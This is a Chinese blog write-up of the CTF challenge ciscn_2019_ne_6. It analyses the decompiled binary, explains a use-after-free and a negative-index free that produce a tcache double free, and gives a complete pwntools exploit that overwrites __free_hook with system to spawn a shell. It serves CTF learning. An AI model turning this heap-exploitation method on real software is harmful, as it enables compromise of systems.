利用全局chunk数组,free(负数)来实现tcache double free

最新推荐文章于 2023-12-08 14:44:46 发布
最新推荐文章于 2023-12-08 14:44:46 发布
阅读量159 收藏
点赞数
分类专栏: 堆利用 pwn BUUCTF 文章标签: linux python c语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/127379165
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏
本文介绍了一个CISCN_2019_NE_6的漏洞利用过程,涉及全局chunk数组、free()负数指针、TCacheDoubleFree等概念。通过分配、释放、再分配chunk,实现UAF并泄露libc地址,最终利用TCacheDoubleFree篡改`__free_hook`,执行任意代码。
摘要由CSDN通过智能技术生成

例题 ciscn_2019_ne_6

利用全局chunk数组,free(负数)来实现tcache double free

在这里插入图片描述

保护全开

在这里插入图片描述

四个功能增删查改

main函数

void __fastcall main(__int64 a1, char **a2, char **a3)
{
  set();
  sett();
  while ( 1 )
  {
    menu();
    switch ( off_1424 )
    {
      case 1u:
        show();
        break;
      case 2u:
        root();
        add();
        break;
      case 3u:
        root();
        edit();
        break;
      case 4u:
        root();
        delete();
        break;
      case 5u:
        puts("Bye");
        exit(0);
        return;
      default:
        puts("Invaild");
        break;
    }
  }
}

add函数

最多申请10个chunk

unsigned __int64 sub_1053()
{
  __int64 chunk; // rbx
  __int64 index; // [rsp+0h] [rbp-20h]
  int indexa; // [rsp+0h] [rbp-20h]
  int size; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 v5; // [rsp+8h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  LODWORD(index) = 0;
  while ( index <= 9 && *(16LL * index + heap) )
    LODWORD(index) = index + 1;
  if ( index == 10 )                            // 最多申请10个chunk
  {
    puts("Full");
  }
  else
  {
    printf("size:", index);
    size = my_read();
    if ( size > 0 )
    {
      *(16LL * indexa + heap) = size;
      chunk = heap;
      *(chunk + 16LL * indexa + 8) = malloc(size);
      printf("Content:");
      my_read1(*(16LL * indexa + heap + 8), size);
      printf("addr: %p\n", *(16LL * indexa + heap + 8) & 0xFFFLL);
    }
    else
    {
      puts("No No No size must be greater than 0");
    }
  }
  return __readfsqword(0x28u) ^ v5;
}

delete函数

存在UAF

unsigned __int64 sub_12B8()
{
  int index; // [rsp+Ch] [rbp-14h]
  void *ptr; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("index:");
  index = my_read();
  if ( index >= 0 && index <= 9 )
  {
    ptr = *(16LL * index + heap + 8);
    *(16LL * index + heap) = 0LL;
    *(16LL * index + heap + 8) = 0LL;
  }
  if ( ptr )
    free(ptr);                                  // uaf
                                                // 
  return __readfsqword(0x28u) ^ v3;
}

show函数和edit函数没有什么特别的地方
还需要注意一个root函数
变量s2在全局chunk数组附近

unsigned __int64 sub_F0D()
{
  char s; // [rsp+0h] [rbp-30h]
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&s, 0, 0x28uLL);
  printf("passwd:", 0LL);
  my_read1(&s, 0x28);
  if ( !strncmp(&s, s2, 0x28uLL) )
    printf("I will tell you magic's address: %p\n", s2);
  else
    puts("No No No you are not root.");
  return __readfsqword(0x28u) ^ v2;
}

在这里插入图片描述

思路

分配一个chunk,free后进入unsorted bin,再次申请不填写内容chunk,泄露libc,之后利用uaf和实现tcache double free,劫持free_hook,这其中需要泄露heap地址,我们在泄露libc后用a覆盖main_arena+96直至heap地址泄露heap地址

部分代码

from pwn import *
context(endian='little',os='linux',arch='amd64',log_level='debug')
sh = process('./ciscn_2019_ne_6')
elf = ELF('./ciscn_2019_ne_6')
libc = ELF('/home/pwn/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#sh = remote('node4.buuoj.cn', 29556)  
s       = lambda data               :sh.send(data)
sa      = lambda delim,data         :sh.sendafter(delim, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda delim,data         :sh.sendlineafter(delim, data)
r       = lambda num=4096           :sh.recv(num)
ru      = lambda delims		    :sh.recvuntil(delims)
itr     = lambda                    :sh.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data)) 
def dbg():
        gdb.attach(sh)
        pause()
def show():
    sla(b'>> ', b'1')
def add(size,text='a',passwd='\x00'):
    sla(b'>> ', b'2')
    sla(b'passwd:', passwd)  
    sla('size:',str(size))
    sla('Content:',text)
def edit(index,text,passwd='\x00'):
    sla(b'>> ', b'3')
    sla(b'passwd:', passwd)  
    sla('index:',str(index))
    sla('Content:',text)
def free(index,passwd=b'a\n'):
    sla(b'>> ', b'4')
    sa(b'passwd:', passwd)
    sla('index:',str(index))
add(0x500)#0
add(0x30)#1
add(0x30)#2
free(0)
add(0x18,'')#0
show()
ru('0: ')
libc_base = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x3ebca0-0x430
system  = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
lg('libc_base',libc_base)
 
edit(0,b'a'*0x11)
show()
ru(b"a"*0x10)
heap = u64(sh.recvuntil('\n',drop=True).ljust(8,b'\x00'))-0x361
lg("heap",heap)
dbg()

在这里插入图片描述

exp

from pwn import *
context(endian='little',os='linux',arch='amd64',log_level='debug')
sh = process('./ciscn_2019_ne_6')
elf = ELF('./ciscn_2019_ne_6')
libc = ELF('/home/pwn/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#sh = remote('node4.buuoj.cn', 29556)  
s       = lambda data               :sh.send(data)
sa      = lambda delim,data         :sh.sendafter(delim, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda delim,data         :sh.sendlineafter(delim, data)
r       = lambda num=4096           :sh.recv(num)
ru      = lambda delims		    :sh.recvuntil(delims)
itr     = lambda                    :sh.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data)) 
def dbg():
        gdb.attach(sh)
        pause()
def show():
    sla(b'>> ', b'1')
def add(size,text='a',passwd='\x00'):
    sla(b'>> ', b'2')
    sla(b'passwd:', passwd)  
    sla('size:',str(size))
    sla('Content:',text)
def edit(index,text,passwd='\x00'):
    sla(b'>> ', b'3')
    sla(b'passwd:', passwd)  
    sla('index:',str(index))
    sla('Content:',text)
def free(index,passwd=b'a\n'):
    sla(b'>> ', b'4')
    sa(b'passwd:', passwd)
    sla('index:',str(index))
add(0x500)#0
add(0x30)#1
add(0x30)#2
free(0)
add(0x18,'')#0
show()
ru('0: ')
libc_base = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x3ebca0-0x430
system  = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
lg('libc_base',libc_base)
 
edit(0,b'a'*0x11)
show()
ru(b"a"*0x10)
heap = u64(sh.recvuntil('\n',drop=True).ljust(8,b'\x00'))-0x361
lg("heap",heap)
 
add(0x4e0)
free(2)
free(1)
add(0x30,'')#2

free(-1,b'\x00'*0x20+p64(heap+0x860))

add(0x30,p64(free_hook))#3
add(0x30,'/bin/sh\x00')#4
add(0x30,p64(system))#5
free(4)
itr()
tbsqigongzi
关注
专栏目录
C: Coredump-N:重复释放 double free/deallocation detected in tcache 2
mzhan017的博客
12-02 2051
#0 0xf7eea129 in __kernel_vsyscall () #1 0xf6f200f6 in raise () from /lib/libc.so.6 #2 0xf6f09dd4 in abort () from /lib/libc.so.6 #3 0xf6f64a7c in __libc_message () from /lib/libc.so.6 #4 0xf6f6c57f in malloc_printerr () from /lib/libc.so.6 #5 0xf6f6
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4242
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
[tcache double free] Mynote
huzai9527的博客
07-11 502
[tcache double free] 1. ida分析 存在double free 以及 uaf 题目给的libc是早期的可以进行double free的2.27版本 关于如何使用题目提供的libc进行调试,看ctf-pwn-patchelf-用题目给的libc运行二进制文件 2.思路 先填满tcache,使用unstored bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache) 利用double free修改free_hook为system
lonelywolf_exp(tcache double free)
qq_33590156的博客
08-04 174
题目只能申请一个chunk指针,但是可以重复申请chunk,而且存在uaf,不可溢出 首先绕过tcache的check使用double free泄露堆地址(老版本是可以直接free的,但是新版本需要free后edit一下再free),然后通过uaf在tcache中存放好两个指针,一个用来修改size,一个用来free chunk,之后申请0x70chunk,和另一个chunk防止合并。接着通过第一根指针修改size>0x80,然后通过第二根指针freechunk,使用double free将他fre
[tcache double free + orw]MynoteMax
huzai9527的博客
07-11 225
[tcache double free + orw]MynoteMax 1. ida分析 漏洞点和Mynote一样,但是加了沙盒 禁用了execve,因此同样利用double free 和 uaf 进行 orw进行操作 2. 思路 本题需要从堆打到栈,需要利用一些通用的gadgets, 如setcontext + 53 将 free_hook 设置为 setcontext +53,再在相应的chunk中布置相应的sigframe free掉相应的chunk触发setcontext(srop),
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1532
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunkfree的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
i春秋2020新春战役PWN之document(绕过tcachedouble free检测)
seaaseesa的博客
02-27 3177
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
php使用array_chunk函数将一个数组分割成多个数组
10-17
总结来说,array_chunk函数在PHP中用于将一个数组分割成多个数组非常方便,但要注意其对内存的要求。正确使用时,应先评估原数组的大小,必要时适当增加内存限制,或者按需分批次处理数组,以避免发生内存溢出的错误...
Double free 漏洞复现与利用
vivid_moon的博客
05-29 5665
2018体系结构安全大作业申明:转载请注明出处选题:2015 年 0ctf 题题目描述:提供记事本功能的二进制文件,找出其漏洞,get shell第一章 操作说明为方便老师审核作业,本报告将操作说明放在第一章。操作流程如下:1 、安装 netcat 。2 、安装 pwntools 库。命令: pip install pwntools (安装过程中,一定要保证网络畅通,曾经因为网不好装这个库装了一个...
从两道基础题简单认识和了解fastbin double free漏洞的利用
weixin_44864859的博客
07-13 1024
fastbin double free原理 Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。(即可以构造假的chunk实现任意地址写) Fastbin Double Free 能够成功利用主要有两部分的原因 fastbin 的堆块被释放后
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1073
浙江省第五届大学生网络与信息安全竞赛预赛pwn
ciscn_2019_ne_6(指针未初始化漏洞)
seaaseesa的博客
06-11 588
ciscn_2019_ne_6(指针未初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr未初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
free(): double free detected in tcache 2 如何解决
热门推荐
qq_49101164的博客
04-19 3万+
free(): double free detected in tcache 2 如何解决 原因 free():在tcache 2中检测到双空闲,在执行程序的过程中对同一块内存单元进行了两次free()操作。 在循环中包含free();语句,容易出现这类问题。 解决方法 可以设置两个指针,进行操作,下面给出示范 出现double free() 的报错 只设置了一个指针变量n,在循环的过程中,会再次对n进行free();操作因此会出现此次问题 double free()得到解决 设置两个指针变量,
double free detected in tcache 2问题记录
最新发布
Z_oioihoii
12-08 481
解释,当执行free(b);时会报错,因为在 b->Test();调用时已经执行了delete this;将堆区的内存释放掉,此时再次根据b的地址去释放会发现不存在,所以报错double free detected in tcache 2。
Tcache bin总结
N1rvana的博客
03-13 1654
Tcache Tcache是glibc 2.26之后引入的机制,与glibc 2.23版本下堆利用方式有一定区别,产生了新的利用方式。 0x1 相关结构体 tcache_entry typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; tcache_entry用来链接空闲的tcache chunk,其中的next指针指向下一个大小相同的空闲tcache chunk。 注意:这里的next指针指向的是user
tcache attack
yeshen4328的专栏
11-01 207
tcache attack tcache double free double free可以通过对同一块内存free两次,实现任意地址写。当libc版本在2.26以上时,free的块优先放入tcache,malloc也优先从tcache中取,性能更好。但是安全检查变弱了。 static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); ass
解决方案之一:free(): double free detected in tcache 2
活在当下
11-08 746
1. 检查对象中的成员,尤其是智能指针,是否指向了单一资源,而改资源在其他地方已经释放,这样会导致在本类析构时,再次释放改智能指针,导致该异常。
段错误 (核心已转储) + free(): double free detected in tcache 2 已放弃 (核心已转储)
Kearney
07-05 9016
status $ ./server 段错误 (核心已转储) # another terminal $ ./client File transfer success! free(): double free detected in tcache 2 已放弃 (核心已转储) 文件正常接受 sulotion 万事先搜索 free(): double free detected in tcache 2 如何解决 从此为bug秃头 2021-04-19 free():在tcache 2中检测到双空闲,在执行程
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1095
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
HLS实现将输入的数组利用并行相加来得到相加结果
05-12
HLS (High-Level Synthesis) 是一种将高级语言代码转换为硬件电路的技术。在HLS中,可以使用并行化技术来实现加速计算。以下是一个简单的例子,演示如何使用并行化技术实现输入数组的相加。 假设我们有一个包含 N 个元素的数组 A,我们想要将这些元素相加得到一个结果 S。我们可以将数组 A 分成 p 个部分,每个部分包含 N/p 个元素。然后,我们可以使用 p 个加法器并行地将这些部分相加。最后,将所有 p 个加法器的输出相加,得到最终的结果 S。 如下是使用 HLS 实现输入数组的并行相加的示例代码: ```c++ #include "ap_int.h" // 定义加法器 ap_int<32> adder(ap_int<32> a, ap_int<32> b) { return a + b; } void sum_array(ap_int<32> A[1024], int N, ap_int<32>& S) { // 将数组 A 分成 4 个部分,每个部分包含 N/4 个元素 int p = 4; int chunk_size = N / p; // 使用并行化技术计算数组的和 ap_int<32> sum[p]; #pragma HLS array_partition variable=sum complete for (int i = 0; i < p; i++) { sum[i] = 0; for (int j = 0; j < chunk_size; j++) { sum[i] = adder(sum[i], A[i * chunk_size + j]); } } // 将所有部分的和相加 S = 0; for (int i = 0; i < p; i++) { S = adder(S, sum[i]); } } ``` 在这个例子中,我们首先定义了一个 adder 函数来实现加法器。然后,我们定义了一个名为 sum_array 的函数,该函数接受一个包含 N 个元素的数组 A 和一个指向结果 S 的指针。在函数中,我们将数组 A 分成 p 个部分,并使用并行化技术计算数组的和。最后,我们将所有部分的和相加,得到最终的结果 S。 在 HLS 中,我们可以使用 #pragma HLS array_partition 指令来将数组分割成多个部分,从而实现并行化计算。在这个例子中,我们使用 #pragma HLS array_partition variable=sum complete 将 sum 数组分割成 4 个部分,以便并行计算。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值